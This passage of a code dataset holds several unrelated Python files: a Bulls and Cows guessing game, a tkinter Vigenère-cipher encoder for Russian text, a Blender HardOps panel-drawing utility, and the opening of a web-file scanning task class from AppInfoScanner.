code:\n') #code to be guessed by player 1\nif len(code2)!=3:\n    print(Player2+', that code is not valid. Exiting.')\n    exit(0)\nif code2.islower()==False or code2.isalpha()==False: #to check if its from a-z\n    print(Player2+', that code is not valid. Exiting.')\n    exit(0)\nif code2[0]==code2[1] or code2[1]==code2[2] or code2[0]==code2[2]:\n    print(Player2+', that code is not valid. Exiting.') #to check if the characters aren't the same\n    exit(0)\nflag=0 \nwhile flag==0: #loop to give unlimited chances until the guess is correct\n    guess1=input(str(Player1)+', enter guess:\n')\n    bulls=0\n    cows=0\n    i=0 #index variable\n    while i<=(len(code1)-1):\n        if code2[i]==guess1[i]: #comparing each character with the same index\n            bulls+=1\n        \n        j=0 #another index variable used in getting cows value\n        while j<=2:\n            if code2[i]==guess1[j]:\n                if code2[j]!=guess1[j]: #comparing characters with a different index\n                    cows+=1\n            j+=1\n        i+=1  \n    if code2==guess1: \n        print(Player1,'wins!') #once the guess is correct, the game ends with exit(0)\n        exit(0)\n    print(' * bulls:',bulls)\n    print(' * cows: ',cows)\n    guess2=input(str(Player2)+', enter guess:\n')\n    bulls=0\n    cows=0\n    i=0 #index variable\n    while i<=(len(code1)-1):\n        if code1[i]==guess2[i]: #comparing each character with the same index\n            bulls+=1\n        j=0 #another index variable used in getting cows value\n        while j<=2:\n            if code1[i]==guess2[j]:\n                if code1[j]!=guess2[j]: #comparing characters with a different index\n                    cows+=1\n            j+=1\n        i+=1\n    if code1==guess2:\n        print(Player2,'wins!')\n        exit(0) #once the guess is correct, the game ends with exit(0)\n    print(' * bulls:',bulls)\n    print(' * cows: ',cows)","sub_path":"bulls_and_cows.py","file_name":"bulls_and_cows.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"334517660","text":"import tkinter\r\nfrom tkinter import *\r\n# Python's alphabet in chr and ord has no letter 'ё', so this program will not work with the regular Russian alphabet, but it does encrypt with a Vigenère cipher over Python's Russian alphabet\r\ndef main():\r\n    l=0 # counter used to build a key-letter list as long as the string being encoded\r\n    o=[] # list of letters of the encoded string\r\n    u=[] # list of key letters with the same length as the string being encoded\r\n    b=a.get() # the string to encode\r\n    p=c.get() # the keyword\r\n    s = [char for char in b] # list of letters of the string to encode\r\n    k= [char for char in p] # list of letters of the keyword\r\n    for i in range(len(s)): # build the key-letter list with the length of the string being encoded\r\n        u.append(k[l])\r\n        l=l+1\r\n        if l == len(k):\r\n            l=0\r\n    for i in range(len(s)): # the encoding itself\r\n        if 1072<=ord(s[i])<=1103: # select: 1072 to 1103 are the codes of the letters а-я\r\n            t = ord(s[i])\r\n            if t+ord(u[i])-2142>32: # sum the letter numbers: if at most 32 (the size of the alphabet) add it to 1072, if above 32 wrap it around the alphabet before adding to 1072\r\n                o.append(chr(1072+t+ord(u[i])-2142-32))\r\n            else:\r\n                o.append(chr(1072 + t + ord(u[i]) - 2142))\r\n        elif 1040<=ord(s[i])<=1071:\r\n            t = ord(s[i]) + 32\r\n            if t + ord(u[i]) - 2142 > 32:\r\n                o.append(chr(1072 + t + ord(u[i]) - 2142 - 32 - 32))\r\n            else:\r\n                o.append(chr(1072 + t + ord(u[i]) - 2142-32))\r\n        else:\r\n            o.append(s[i]) # and append to the new list\r\n    return a.set(''.join(map(str, o))) # write the encoded list out as a string\r\n\r\nwindow = Tk()\r\nwindow.title(\"Vigenère Cipher\")\r\nwindow.geometry('270x200')\r\na =StringVar()\r\nc = StringVar()\r\nlab = Label(text=\"Enter the word:\")\r\nlab.place(x=12,y=0)\r\npole = Entry(window,width=40 ,textvariable=a)\r\npole.place(x=15,y=20)\r\nlab1 = Label(text=\"Enter the key:\")\r\nlab1.place(x=12,y=40)\r\npole1 = Entry(window,width=40 ,textvariable=c)\r\npole1.place(x=15,y=60)\r\nknopka = tkinter.Button(window, text = \"Encrypt\",command = main)\r\nknopka.place(x=85,y=90)\r\nwindow.mainloop()\r\n","sub_path":"шифр_Виженера.py","file_name":"шифр_Виженера.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"252185788","text":"import bpy\r\nimport re\r\n\r\n\r\nfrom bl_ui import (\r\n    properties_object,\r\n    properties_constraint,\r\n    properties_data_modifier,\r\n    properties_data_shaderfx,\r\n    properties_data_mesh,\r\n    properties_data_curve,\r\n    properties_data_metaball,\r\n    properties_data_gpencil,\r\n    # properties_grease_pencil_common,\r\n    properties_data_armature,\r\n    properties_data_bone,\r\n    properties_data_lattice,\r\n    properties_data_empty,\r\n    properties_data_speaker,\r\n    properties_data_camera,\r\n    properties_data_light,\r\n    properties_data_lightprobe,\r\n    properties_material,\r\n    properties_material_gpencil,\r\n)\r\n\r\nfrom bl_ui.properties_animviz import (\r\n    MotionPathButtonsPanel,\r\n    MotionPathButtonsPanel_display,\r\n)\r\n\r\nfrom .. 
Panels import cutting_material, workflow, sharp_options, mirror_options, operator_options, mesh_clean_options, special_options\r\n\r\npanel_node_draw = None\r\n\r\n\r\ndef options():\r\n wm = bpy.context.window_manager\r\n option = wm.Hard_Ops_helper_options\r\n\r\n if 'options' not in option.panels:\r\n option.name = 'HardOps Helper'\r\n\r\n new = option.panels.add()\r\n new.name = 'options'\r\n\r\n new.tool.add().name = 'Tool'\r\n new.object.add().name = 'Object'\r\n new.constraint.add().name = 'Constraint'\r\n new.modifier.add().name = 'Modifier'\r\n\r\n data = new.data.add()\r\n data.name = 'Data'\r\n\r\n data.mesh.add().name = 'Mesh'\r\n data.curve.add().name = 'Curve'\r\n data.surface.add().name = 'Surface'\r\n data.meta.add().name = 'Meta'\r\n data.font.add().name = 'Font'\r\n data.gpencil.add().name = 'GPencil'\r\n data.armature.add().name = 'Armature'\r\n data.lattice.add().name = 'Lattice'\r\n data.empty.add().name = 'Empty'\r\n data.speaker.add().name = 'Speaker'\r\n data.camera.add().name = 'Camera'\r\n data.light.add().name = 'Light'\r\n data.light_probe.add().name = 'Light_Probe'\r\n\r\n new.shaderfx.add().name = 'ShaderFX'\r\n new.bone.add().name = 'Bone'\r\n new.bone_constraint.add().name = 'Bone Constraint'\r\n new.material.add().name = 'Material'\r\n\r\n return option\r\n\r\n\r\ndef expand(pt):\r\n context = bpy.context\r\n wm = context.window_manager\r\n option = options()\r\n obj = context.active_object\r\n\r\n # re.split(pattern, string, maxsplit=0, flags=0)\r\n if not hasattr(pt, 'bl_options') or 'HIDE_HEADER' not in pt.bl_options:\r\n if option.context != 'DATA':\r\n panel = getattr(option.panels[0], option.context.lower())[0]\r\n return getattr(panel, F'expand_{re.split(\".*_PT_\", pt.__name__)[1]}')\r\n\r\n else:\r\n panel = getattr(option.panels[0].data[0], obj.type.lower())[0]\r\n return getattr(panel, F'expand_{re.split(\".*_PT_\", pt.__name__)[1]}')\r\n else:\r\n return True\r\n\r\n\r\ndef header_prop(pt):\r\n if pt.__name__ == 'OBJECT_PT_display_bounds':\r\n return bpy.context.active_object, 'show_bounds'\r\n\r\n elif pt.__name__ == 'DATA_PT_pathanim':\r\n return bpy.context.active_object.data, 'use_path'\r\n\r\n elif pt.__name__ == 'DATA_PT_camera_safe_areas':\r\n return bpy.context.active_object.data, 'show_safe_areas'\r\n\r\n elif pt.__name__ == 'DATA_PT_camera_safe_areas_center_cut':\r\n return bpy.context.active_object.data, 'show_safe_center'\r\n\r\n elif pt.__name__ == 'DATA_PT_camera_background_image':\r\n return bpy.context.active_object.data, 'show_background_images'\r\n\r\n elif pt.__name__ == 'DATA_PT_display_passepartout':\r\n return bpy.context.active_object.data, 'show_passepartout'\r\n\r\n elif pt.__name__ == 'DATA_PT_normals_auto_smooth':\r\n return bpy.context.active_object.data, 'use_auto_smooth'\r\n\r\n elif pt.__name__ == 'DATA_PT_EEVEE_light_distance':\r\n return bpy.context.active_object.data, 'use_custom_distance'\r\n\r\n elif pt.__name__ == 'DATA_PT_EEVEE_shadow':\r\n return bpy.context.active_object.data, 'use_shadow'\r\n\r\n elif pt.__name__ == 'DATA_PT_EEVEE_shadow_contact':\r\n return bpy.context.active_object.data, 'use_contact_shadow'\r\n\r\n elif pt.__name__ == 'DATA_PT_lightprobe_parallax':\r\n return bpy.context.active_object.data, 'use_custom_parallax'\r\n\r\n elif pt.__name__ == 'BONE_PT_deform':\r\n if bpy.context.workspace.tools_mode == 'POSE':\r\n bone = bpy.context.active_object.data.bones[bpy.context.active_pose_bone.name]\r\n else:\r\n bone = bpy.context.active_object.data.bones[bpy.context.active_bone.name]\r\n return 
bone, 'use_deform'\r\n\r\n return None\r\n\r\n\r\ndef header_presets(pt):\r\n return None\r\n\r\n\r\ndef child_panels(pt, ot):\r\n items = []\r\n for panel in ot.panels[options().context]:\r\n if hasattr(panel, 'bl_parent_id') and panel.bl_parent_id == pt.__name__:\r\n items.append(panel)\r\n\r\n return items\r\n\r\n\r\ndef init_panels(ot):\r\n context = bpy.context\r\n option = options()\r\n\r\n ot.panels = {\r\n 'TOOL': [\r\n special_options.HOPS_PT_specialoptions,\r\n workflow.HOPS_PT_workflow,\r\n sharp_options.HOPS_PT_sharp_options,\r\n mesh_clean_options.HOPS_PT_mesh_clean_options,\r\n mirror_options.HOPS_PT_mirror_options,\r\n operator_options.HOPS_PT_operator_options],\r\n\r\n 'OBJECT': [],\r\n 'CONSTRAINT': [],\r\n 'MODIFIER': [],\r\n 'SHADERFX': [],\r\n 'DATA': [],\r\n # 'BONE': [],\r\n # 'BONE_CONSTRAINT': [],\r\n 'MATERIAL': []}\r\n\r\n obj = context.active_object\r\n if obj:\r\n ot.panels['OBJECT'] = [\r\n properties_object.OBJECT_PT_context_object,\r\n properties_object.OBJECT_PT_transform,\r\n properties_object.OBJECT_PT_delta_transform,\r\n properties_object.OBJECT_PT_relations,\r\n properties_object.OBJECT_PT_display,\r\n properties_object.OBJECT_PT_display_bounds]\r\n\r\n ot.panels['CONSTRAINT'] = [properties_constraint.OBJECT_PT_constraints]\r\n\r\n if obj.type in {'MESH', 'CURVE', 'SURFACE', 'FONT', 'META', 'GPENCIL', 'LATTICE'}:\r\n if obj.type != 'GPENCIL':\r\n ot.panels['MODIFIER'] = [properties_data_modifier.DATA_PT_modifiers]\r\n else:\r\n ot.panels['MODIFIER'] = [properties_data_modifier.DATA_PT_gpencil_modifiers]\r\n ot.panels['SHADERFX'] = [properties_data_shaderfx.DATA_PT_shader_fx]\r\n\r\n if obj.type == 'MESH':\r\n ot.panels['DATA'] = [\r\n properties_data_mesh.DATA_PT_context_mesh,\r\n properties_data_mesh.DATA_PT_vertex_groups,\r\n properties_data_mesh.DATA_PT_shape_keys,\r\n properties_data_mesh.DATA_PT_uv_texture,\r\n properties_data_mesh.DATA_PT_vertex_colors,\r\n properties_data_mesh.DATA_PT_face_maps,\r\n properties_data_mesh.DATA_PT_normals,\r\n properties_data_mesh.DATA_PT_normals_auto_smooth,\r\n properties_data_mesh.DATA_PT_texture_space,\r\n properties_data_mesh.DATA_PT_customdata]\r\n\r\n elif obj.type in {'CURVE', 'SURFACE', 'FONT'}:\r\n ot.panels['DATA'] = [\r\n properties_data_curve.DATA_PT_context_curve,\r\n properties_data_curve.DATA_PT_shape_curve,\r\n properties_data_curve.DATA_PT_geometry_curve,\r\n properties_data_curve.DATA_PT_geometry_curve_bevel,\r\n properties_data_curve.DATA_PT_pathanim,\r\n properties_data_curve.DATA_PT_active_spline,\r\n properties_data_curve.DATA_PT_curve_texture_space]\r\n\r\n if obj.type != 'FONT':\r\n ot.panels['DATA'].append(properties_data_mesh.DATA_PT_shape_keys)\r\n else:\r\n ot.panels['DATA'].append(properties_data_curve.DATA_PT_font)\r\n ot.panels['DATA'].append(properties_data_curve.DATA_PT_font_transform)\r\n ot.panels['DATA'].append(properties_data_curve.DATA_PT_paragraph)\r\n ot.panels['DATA'].append(properties_data_curve.DATA_PT_paragraph_alignment)\r\n ot.panels['DATA'].append(properties_data_curve.DATA_PT_paragraph_spacing)\r\n ot.panels['DATA'].append(properties_data_curve.DATA_PT_text_boxes)\r\n\r\n\r\n elif obj.type == 'META':\r\n ot.panels['DATA'] = [\r\n properties_data_metaball.DATA_PT_context_metaball,\r\n properties_data_metaball.DATA_PT_metaball,\r\n properties_data_metaball.DATA_PT_metaball_element,\r\n properties_data_metaball.DATA_PT_mball_texture_space]\r\n\r\n elif obj.type == 'GPENCIL':\r\n ot.panels['DATA'] = [\r\n properties_data_gpencil.DATA_PT_gpencil_layers,\r\n 
properties_data_gpencil.DATA_PT_gpencil_onion_skinning,\r\n properties_data_gpencil.DATA_PT_gpencil_vertex_groups,\r\n properties_data_gpencil.DATA_PT_gpencil_strokes,\r\n properties_data_gpencil.DATA_PT_gpencil_display,\r\n properties_data_gpencil.DATA_PT_gpencil_canvas]\r\n\r\n if context.active_gpencil_layer:\r\n ot.panels['DATA'].extend([\r\n properties_data_gpencil.DATA_PT_gpencil_layer_adjustments,\r\n properties_data_gpencil.DATA_PT_gpencil_layer_relations])\r\n\r\n elif obj.type == 'ARMATURE':\r\n ot.panels['DATA'] = [\r\n properties_data_armature.DATA_PT_context_arm,\r\n properties_data_armature.DATA_PT_skeleton,\r\n properties_data_armature.DATA_PT_display,\r\n properties_data_armature.DATA_PT_bone_groups,\r\n properties_data_armature.DATA_PT_pose_library,\r\n properties_data_armature.DATA_PT_iksolver_itasc]\r\n\r\n ot.panels['BONE'] = [\r\n properties_data_bone.BONE_PT_context_bone,\r\n properties_data_bone.BONE_PT_transform,\r\n properties_data_bone.BONE_PT_curved,\r\n properties_data_bone.BONE_PT_relations,\r\n properties_data_bone.BONE_PT_display,\r\n properties_data_bone.BONE_PT_inverse_kinematics,\r\n properties_data_bone.BONE_PT_deform]\r\n\r\n ot.panels['BONE_CONSTAINT'] = [properties_constraint.BONE_PT_constraints]\r\n\r\n elif obj.type == 'LATTICE':\r\n ot.panels['DATA'] = [\r\n properties_data_lattice.DATA_PT_context_lattice,\r\n properties_data_lattice.DATA_PT_lattice,\r\n properties_data_mesh.DATA_PT_vertex_groups,\r\n properties_data_mesh.DATA_PT_shape_keys]\r\n\r\n elif obj.type == 'EMPTY':\r\n ot.panels['DATA'] = [properties_data_empty.DATA_PT_empty]\r\n\r\n elif obj.type == 'SPEAKER':\r\n ot.panels['DATA'] = [\r\n properties_data_speaker.DATA_PT_context_speaker,\r\n properties_data_speaker.DATA_PT_speaker,\r\n properties_data_speaker.DATA_PT_distance,\r\n properties_data_speaker.DATA_PT_cone]\r\n\r\n elif obj.type == 'CAMERA':\r\n if context.scene.render.engine in {'BLENDER_WORKBENCH', 'BLENDER_EEVEE'}:\r\n ot.panels['DATA'] = [\r\n properties_data_camera.DATA_PT_context_camera,\r\n properties_data_camera.DATA_PT_lens,\r\n properties_data_camera.DATA_PT_camera_dof,\r\n properties_data_camera.DATA_PT_camera_dof_aperture,\r\n properties_data_camera.DATA_PT_camera_stereoscopy,\r\n properties_data_camera.DATA_PT_camera,\r\n properties_data_camera.DATA_PT_camera_safe_areas,\r\n properties_data_camera.DATA_PT_camera_safe_areas_center_cut,\r\n properties_data_camera.DATA_PT_camera_background_image,\r\n properties_data_camera.DATA_PT_camera_display,\r\n properties_data_camera.DATA_PT_camera_display_passepartout]\r\n\r\n else:\r\n from cycles import ui\r\n\r\n ot.panels['DATA'] = [\r\n properties_data_camera.DATA_PT_context_camera,\r\n properties_data_camera.DATA_PT_lens,\r\n ui.CYCLES_CAMERA_PT_camera_dof,\r\n ui.CYCLES_CAMERA_PT_camera_dof_aperture,\r\n ui.CYCLES_CAMERA_PT_camera_dof_viewport,\r\n properties_data_camera.DATA_PT_camera_stereoscopy,\r\n properties_data_camera.DATA_PT_camera,\r\n properties_data_camera.DATA_PT_camera_safe_areas,\r\n properties_data_camera.DATA_PT_camera_background_image,\r\n properties_data_camera.DATA_PT_camera_display,\r\n properties_data_camera.DATA_PT_camera_display_passepartout]\r\n\r\n elif obj.type == 'LIGHT':\r\n if context.scene.render.engine == 'BLENDER_WORKBENCH':\r\n ot.panels['DATA'] = [\r\n properties_data_light.DATA_PT_context_light,\r\n properties_data_light.DATA_PT_preview,\r\n properties_data_light.DATA_PT_light,\r\n properties_data_light.DATA_PT_area]\r\n\r\n\r\n elif context.scene.render.engine == 'BLENDER_EEVEE':\r\n 
ot.panels['DATA'] = [\r\n properties_data_light.DATA_PT_context_light,\r\n properties_data_light.DATA_PT_preview,\r\n properties_data_light.DATA_PT_EEVEE_light,\r\n properties_data_light.DATA_PT_EEVEE_light_distance,\r\n properties_data_light.DATA_PT_spot,\r\n properties_data_light.DATA_PT_EEVEE_shadow,\r\n properties_data_light.DATA_PT_EEVEE_shadow_contact]\r\n\r\n if bpy.context.active_object.data.type == 'SUN':\r\n ot.panels['DATA'].append(properties_data_light.DATA_PT_EEVEE_shadow_cascaded_shadow_map)\r\n\r\n else:\r\n from cycles import ui\r\n\r\n ot.panels['DATA'] = [\r\n properties_data_light.DATA_PT_context_light,\r\n ui.CYCLES_LIGHT_PT_preview,\r\n ui.CYCLES_LIGHT_PT_light,\r\n ui.CYCLES_LIGHT_PT_nodes,\r\n ui.CYCLES_LIGHT_PT_spot]\r\n\r\n elif obj.type == 'LIGHT_PROBE':\r\n ot.panels['DATA'] = [\r\n properties_data_lightprobe.DATA_PT_context_lightprobe,\r\n properties_data_lightprobe.DATA_PT_lightprobe,\r\n properties_data_lightprobe.DATA_PT_lightprobe_visibility,\r\n properties_data_lightprobe.DATA_PT_lightprobe_parallax,\r\n properties_data_lightprobe.DATA_PT_lightprobe_display]\r\n\r\n if obj.type in {'MESH', 'CURVE', 'SURFACE', 'META', 'FONT', 'GPENCIL'}:\r\n if obj.type != 'GPENCIL':\r\n if context.scene.render.engine == 'BLENDER_WORKBENCH':\r\n ot.panels['MATERIAL'] = [\r\n properties_material.EEVEE_MATERIAL_PT_context_material,\r\n properties_material.MATERIAL_PT_viewport,\r\n cutting_material.HOPS_PT_material_hops]\r\n\r\n elif context.scene.render.engine == 'BLENDER_EEVEE':\r\n ot.panels['MATERIAL'] = [\r\n properties_material.EEVEE_MATERIAL_PT_context_material,\r\n properties_material.MATERIAL_PT_preview,\r\n properties_material.EEVEE_MATERIAL_PT_surface,\r\n properties_material.EEVEE_MATERIAL_PT_volume,\r\n properties_material.MATERIAL_PT_viewport,\r\n properties_material.EEVEE_MATERIAL_PT_settings,\r\n cutting_material.HOPS_PT_material_hops]\r\n\r\n else:\r\n from cycles import ui\r\n\r\n ot.panels['MATERIAL'] = [\r\n ui.CYCLES_PT_context_material,\r\n ui.CYCLES_MATERIAL_PT_preview,\r\n ui.CYCLES_MATERIAL_PT_surface,\r\n ui.CYCLES_MATERIAL_PT_volume,\r\n ui.CYCLES_MATERIAL_PT_displacement,\r\n properties_material.MATERIAL_PT_viewport,\r\n ui.CYCLES_MATERIAL_PT_settings,\r\n ui.CYCLES_MATERIAL_PT_settings_surface,\r\n ui.CYCLES_MATERIAL_PT_settings_volume,\r\n cutting_material.HOPS_PT_material_hops]\r\n else:\r\n ot.panels['MATERIAL'] = [\r\n properties_material_gpencil.MATERIAL_PT_gpencil_slots,\r\n properties_material_gpencil.MATERIAL_PT_gpencil_preview,\r\n properties_material_gpencil.MATERIAL_PT_gpencil_surface,\r\n properties_material_gpencil.MATERIAL_PT_gpencil_strokecolor,\r\n properties_material_gpencil.MATERIAL_PT_gpencil_fillcolor,\r\n properties_material_gpencil.MATERIAL_PT_gpencil_options]\r\n\r\n\r\nclass context_copy:\r\n\r\n\r\n def __init__(self):\r\n copy = bpy.context.copy()\r\n\r\n obj = copy['active_object']\r\n if obj:\r\n copy['object'] = obj\r\n\r\n copy[obj.type.lower()] = obj.data\r\n copy['material'] = obj.active_material\r\n\r\n copy['space_data'] = None\r\n for area in copy['workspace'].screens[0].areas:\r\n if area.type == 'PROPERTIES':\r\n copy['space_data'] = area.spaces[0]\r\n\r\n if len(obj.material_slots):\r\n copy['material_slot'] = obj.material_slots[obj.active_material_index]\r\n else:\r\n copy['material_slot'] = None\r\n\r\n copy['armature'] = obj.data\r\n copy['pose_bone'] = copy['active_pose_bone']\r\n copy['bone'] = obj.data.bones[copy['pose_bone'].name] if copy['workspace'].tools_mode == 'POSE' else None\r\n copy['edit_bone'] = 
copy['active_bone']\r\n\r\n for key in copy:\r\n setattr(self, key, copy[key])\r\n\r\n\r\n def __new__(self):\r\n self.__init__(self)\r\n\r\n return self\r\n\r\n\r\nclass draw_panel:\r\n\r\n\r\n def __init__(self, ot, pt, layout):\r\n context = context_copy()\r\n self.bl_space_type = 'PROPERTIES'\r\n\r\n if (not hasattr(pt, 'poll') or pt.poll(context)) and not hasattr(pt, 'bl_parent_id'):\r\n if options().context not in {'MODIFIER', 'CONSTRAINT', 'BONE_CONSTAINT', 'SHADERFX'}:\r\n self.layout = layout.box()\r\n else:\r\n self.layout = layout\r\n\r\n self.layout.operator_context = 'INVOKE_DEFAULT'\r\n self.setup_overrides(pt)\r\n\r\n bl_options = getattr(pt, 'bl_options') if hasattr(pt, 'bl_options') else None\r\n if (bl_options and 'HIDE_HEADER' not in bl_options) or not bl_options:\r\n self.header(pt, context, expand(pt), header_prop(pt), header_presets(pt))\r\n\r\n if (bl_options and 'HIDE_HEADER' in bl_options) or expand(pt):\r\n self.panel(pt, context)\r\n\r\n if expand(pt):\r\n for child in child_panels(pt, ot):\r\n if (bl_options and 'HIDE_HEADER' not in bl_options) or not bl_options:\r\n self.layout = layout.box()\r\n self.header(child, context, expand(child), header_prop(child), header_presets(child))\r\n\r\n if (bl_options and 'HIDE_HEADER' in bl_options) or expand(child):\r\n self.panel(child, context)\r\n\r\n\r\n def header(self, pt, context, expand, prop=None, presets=None, emboss=False):\r\n layout = self.layout\r\n\r\n if options().context != 'DATA':\r\n option = getattr(options().panels[0], options().context.lower())[0]\r\n else:\r\n obj = context.active_object\r\n option = getattr(options().panels[0].data[0], obj.type.lower())[0]\r\n\r\n expand_prop = F'expand_{re.split(\".*_PT_\", pt.__name__)[1]}'\r\n\r\n row = layout.row(align=True)\r\n row.alignment = 'LEFT'\r\n row.prop(option, expand_prop, text='', icon=F'DISCLOSURE_TRI_{\"DOWN\" if expand else \"RIGHT\"}', emboss=emboss)\r\n if prop:\r\n row.prop(prop[0], prop[1], text='')\r\n\r\n row.prop(option, expand_prop, toggle=True, text=pt.bl_label, emboss=emboss)\r\n sub = row.row(align=True)\r\n sub.scale_x = 0.70\r\n sub.prop(option, expand_prop, toggle=True, text=' ', emboss=emboss)\r\n\r\n\r\n def panel(self, pt, context):\r\n if options().context not in {'MODIFIER', 'SHADERFX'}:\r\n pt.draw(self, context)\r\n else:\r\n self.draw(self, context)\r\n\r\n\r\n def setup_overrides(self, pt):\r\n global panel_node_draw\r\n\r\n option = options()\r\n obj = bpy.context.active_object\r\n\r\n if bpy.context.scene.render.engine in {'BLENDER_WORKBENCH', 'BLENDER_EEVEE'}:\r\n from bl_ui.properties_material import panel_node_draw\r\n else:\r\n from cycles.ui import panel_node_draw\r\n\r\n if option.context in {'CONSTRAINT', 'BONE_CONSTAINT'}:\r\n panel = properties_constraint.ConstraintButtonsPanel\r\n\r\n def draw_constraint(context, con):\r\n layout = self.layout\r\n\r\n box = layout.template_constraint(con)\r\n\r\n if box:\r\n getattr(panel, con.type)(panel, context, box, con)\r\n\r\n if con.type not in {'RIGID_BODY_JOINT', 'NULL'}:\r\n box.prop(con, 'influence')\r\n\r\n self.draw_constraint = draw_constraint\r\n\r\n elif option.context == 'MODIFIER' and obj.type != 'GPENCIL':\r\n panel = properties_data_modifier.DATA_PT_modifiers\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n\r\n ob = context.object\r\n\r\n # layout.operator_menu_enum('object.modifier_add', 'type')\r\n\r\n row = layout.row(align=True)\r\n row.operator_menu_enum(\"object.modifier_add\", \"type\")\r\n row.operator(\"hops.bool_toggle_viewport\", 
text=\"\", icon=\"HIDE_OFF\")\r\n row.operator(\"hops.open_modifiers\", text=\"\", icon=\"TRIA_DOWN\")\r\n row.operator(\"hops.collapse_modifiers\", text=\"\", icon=\"TRIA_UP\")\r\n\r\n for md in ob.modifiers:\r\n box = layout.template_modifier(md)\r\n if box:\r\n getattr(panel, md.type)(panel, box, ob, md)\r\n\r\n\r\n self.draw = draw\r\n\r\n elif option.context == 'MODIFIER' and obj.type == 'GPENCIL':\r\n panel = properties_data_modifier.DATA_PT_gpencil_modifiers\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n\r\n ob = context.object\r\n\r\n layout.operator_menu_enum('object.gpencil_modifier_add', 'type')\r\n\r\n for md in ob.grease_pencil_modifiers:\r\n box = layout.template_greasepencil_modifier(md)\r\n if box:\r\n # match enum type to our functions, avoids a lookup table.\r\n getattr(panel, md.type)(panel, box, ob, md)\r\n\r\n self.draw = draw\r\n\r\n elif option.context == 'SHADERFX':\r\n panel = properties_data_shaderfx.DATA_PT_shader_fx\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n\r\n ob = context.object\r\n\r\n layout.operator_menu_enum('object.shaderfx_add', 'type')\r\n\r\n for fx in ob.shader_effects:\r\n box = layout.template_shaderfx(fx)\r\n if box:\r\n # match enum type to our functions, avoids a lookup table.\r\n getattr(panel, fx.type)(panel, box, fx)\r\n\r\n self.draw = draw\r\n\r\n elif option.context == 'DATA' and obj and obj.type == 'GPENCIL':\r\n\r\n def draw_layers(context, layout, gpd):\r\n\r\n row = layout.row()\r\n\r\n col = row.column()\r\n layer_rows = 7\r\n col.template_list('GPENCIL_UL_layer', '', gpd, 'layers', gpd.layers, 'active_index',\r\n rows=layer_rows, sort_reverse=True, sort_lock=True)\r\n\r\n gpl = context.active_gpencil_layer\r\n if gpl:\r\n srow = col.row(align=True)\r\n srow.prop(gpl, 'blend_mode', text='Blend')\r\n\r\n srow = col.row(align=True)\r\n srow.prop(gpl, 'opacity', text='Opacity', slider=True)\r\n srow.prop(gpl, 'clamp_layer', text='',\r\n icon='MOD_MASK' if gpl.clamp_layer else 'LAYER_ACTIVE')\r\n\r\n srow = col.row(align=True)\r\n srow.prop(gpl, 'use_solo_mode', text='Show Only On Keyframed')\r\n\r\n col = row.column()\r\n\r\n sub = col.column(align=True)\r\n sub.operator('gpencil.layer_add', icon='ADD', text='')\r\n sub.operator('gpencil.layer_remove', icon='REMOVE', text='')\r\n\r\n if gpl:\r\n sub.menu('GPENCIL_MT_layer_specials', icon='DOWNARROW_HLT', text='')\r\n\r\n if len(gpd.layers) > 1:\r\n col.separator()\r\n\r\n sub = col.column(align=True)\r\n sub.operator('gpencil.layer_move', icon='TRIA_UP', text='').type = 'UP'\r\n sub.operator('gpencil.layer_move', icon='TRIA_DOWN', text='').type = 'DOWN'\r\n\r\n col.separator()\r\n\r\n sub = col.column(align=True)\r\n sub.operator('gpencil.layer_isolate', icon='LOCKED', text='').affect_visibility = False\r\n sub.operator('gpencil.layer_isolate', icon='RESTRICT_VIEW_ON', text='').affect_visibility = True\r\n\r\n self.draw_layers = draw_layers\r\n\r\n elif option.context == 'MATERIAL':\r\n\r\n if pt.__name__ == 'MATERIAL_PT_viewport':\r\n def draw_shared(self, mat):\r\n layout = self.layout\r\n layout.use_property_split = True\r\n\r\n col = layout.column()\r\n col.prop(mat, 'diffuse_color', text='Color')\r\n col.prop(mat, 'metallic')\r\n col.prop(mat, 'roughness')\r\n\r\n self.draw_shared = draw_shared\r\n\r\n elif pt.__name__ == 'EEVEE_MATERIAL_PT_settings':\r\n def draw_shared(self, mat):\r\n layout = self.layout\r\n layout.use_property_split = True\r\n\r\n layout.prop(mat, \"blend_method\")\r\n\r\n if mat.blend_method != 'OPAQUE':\r\n layout.prop(mat, 
\"transparent_shadow_method\")\r\n\r\n row = layout.row()\r\n row.active = ((mat.blend_method == 'CLIP') or (mat.transparent_shadow_method == 'CLIP'))\r\n row.prop(mat, \"alpha_threshold\")\r\n\r\n if mat.blend_method not in {'OPAQUE', 'CLIP', 'HASHED'}:\r\n layout.prop(mat, \"show_transparent_back\")\r\n\r\n layout.prop(mat, \"use_screen_refraction\")\r\n layout.prop(mat, \"refraction_depth\")\r\n layout.prop(mat, \"use_sss_translucency\")\r\n layout.prop(mat, \"pass_index\")\r\n\r\n self.draw_shared = draw_shared\r\n","sub_path":"All_In_One/addons/HOps/ui/hops_helper/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":27460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"264798776","text":"# -*- coding: utf-8 -*-\n# Author: kelvinBen\n# Github: https://github.com/kelvinBen/AppInfoScanner\n\n\nimport os\nimport re\nimport config\nimport threading\nfrom queue import Queue\nimport libs.core as cores\nfrom libs.core.parses import ParsesThreads\n\n\nclass WebTask(object):\n thread_list =[]\n value_list = []\n result_dict = {}\n\n def __init__(self, input, rules,all,threads):\n self.path = input\n if rules:\n config.filter_strs.append(r'.*'+str(rules)+'.*')\n self.all = all\n self.threads = threads\n self.file_queue = Queue()\n self.shell_falg=False\n\n def start(self):\n # 此处判断是文件还是目录\n # 文件判断后缀 html,js,css,htm,xml等\n \n if len(config.web_file_suffix) <=0:\n scanner_file_suffix = [\"html\",\"js\",\"html\",\"xml\"]\n \n scanner_file_suffix = config.web_file_suffix\n if os.path.isdir(self.path): # 目录的话就提取\n self.__get_scanner_file__(self.path,scanner_file_suffix)\n\n else:\n if not (self.path.split(\".\")[1] in scanner_file_suffix): # 内容包含进行下步处理\n err_info = (\"Retrieval of this file type is not supported. 
